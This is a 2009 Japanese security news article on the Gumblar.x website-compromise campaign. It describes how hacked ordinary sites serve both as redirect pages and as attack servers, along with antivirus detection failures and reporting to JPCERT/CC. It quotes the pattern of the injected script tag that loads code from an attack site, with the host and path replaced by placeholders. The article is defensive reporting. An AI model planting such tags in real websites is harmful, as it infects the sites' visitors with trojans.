■今度のGumblarは攻撃サイトも一般サイト
かつての攻撃では、改ざんしたサイトから「gumblar.cn」や「martuz.cn」といった特定の攻撃サーバーに誘導し、ウイルスに感染させるための脆弱性攻撃を仕掛けていた。今回の攻撃の特徴は、誘導先の攻撃サーバーにも改ざんされた一般のWebサイトが用いられている点だ。ここでは、トップページなどに攻撃サイトに誘導するためのリンクが埋め込まれた改ざんサイトを「誘導サイト」、攻撃コードが設置された誘導先の改ざんサイトを「攻撃サイト」と呼ぶことにする。
誘導サイトには、BODYタグの直前に次のようなSCRIPTタグが挿入される。
<script src=http://攻撃サイト/●●●●/■■■■.php ></script>
●●●●は任意のディレクトリ(2階層のものもあり)。「■■■■.php」はPHPで書かれた任意の名前のページで、このページが最初に実行させるJavaScriptコードから、最終的に実行させるトロイの木馬までを生成し、アクセスしたパソコンに送り込んでくる。攻撃サイトにも多数の一般のWebサイトが用いられ、拡張子が「.php」である以外はファイル名も不定であるため、正規のリンクなのか攻撃用の誘導リンクなのかを機械的に判別するのは難しく、URLやIPアドレスでアクセスを制限するのも困難だ。
編集部が調査した再改ざんサイト13件を含む16サイトの改ざんページを、各社のウイルス対策ソフトを使ってチェックするVirusTotalで検出させてみたところ、25日時点では41のソフト全てが、誘導サイトの改ざんページを1件も検出することができなかった。
過去に改ざん被害にあったサイトの管理者の方はもちろん、全てのサイトの管理者の方は、自分のサイトのページに見知らぬリンクが埋め込まれていないかどうか、総点検をお願いしたい。
■カスペルスキーが60以上の攻撃サイトを確認
カスペルスキーは23日、Gumblarに酷似した新たな脅威としてGumblar.xを警告した。同社は、14日の検知以来22日までに、国内の60以上の感染サイトを確認しており、大手ISPや管理機関と連携し、感染サイトの閉鎖に努めているという。
編集部が調査した国内の攻撃サイトは5件。うち1件は、調査時点ですでに攻撃用のページは撤去済だった。残る4件をJPCERTコーディネーションセンター(JPCERT/CC)に報告。問い合わせフォームが設置されていた1件には、当該フォームから早急に対処するようお願いし、別の1件には直接電話を入れてサイトのオーナーに事情を説明した。
オーナーの話では、改ざんされていたことには全く気付かず、前の週にも同様の指摘を受けて削除したのだという。編集部からは、サイト更新用のパソコンがウイルスに感染し、盗み取られたパスワードを使って侵入されている可能性が高いことを説明し、ウイルスに感染していない他のパソコンを使い、サイトのパスワード変更と不正なファイルの削除を行うようお願いした。
24日には、当該サイトのほか、2つのサイトからも攻撃用のページが撤去されたが、残念なことに2サイトとも再改ざんを受けたようで、26日現在、1件は元通りに復活。もう1件は、デンマークの別の攻撃サイトへとリダイレクトするようになっている。
攻撃サイト側は通常の閲覧では問題が発生しないため、誘導サイト以上に改ざんされていることに気付きにくい。誘導リンクが埋め込まれてしまったサイトのオーナーは、自サイトの復旧のみならず、埋め込まれたリンク先をJPCERT/CCなどに報告し、攻撃サイト側の閉鎖・復旧にも協力していただきたい。JPCERT/CCへのインシデント報告は、今年7月から従来からのメールやFAXに加え、サイトのフォーム入力でも受け付けている。
(2009/10/26 ネットセキュリティニュース)
・Gumblar に酷似、新たな脅威発生に警告(カスペルスキーラブスジャパン)
http://www.kaspersky.co.jp/news?id=207578788
・インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/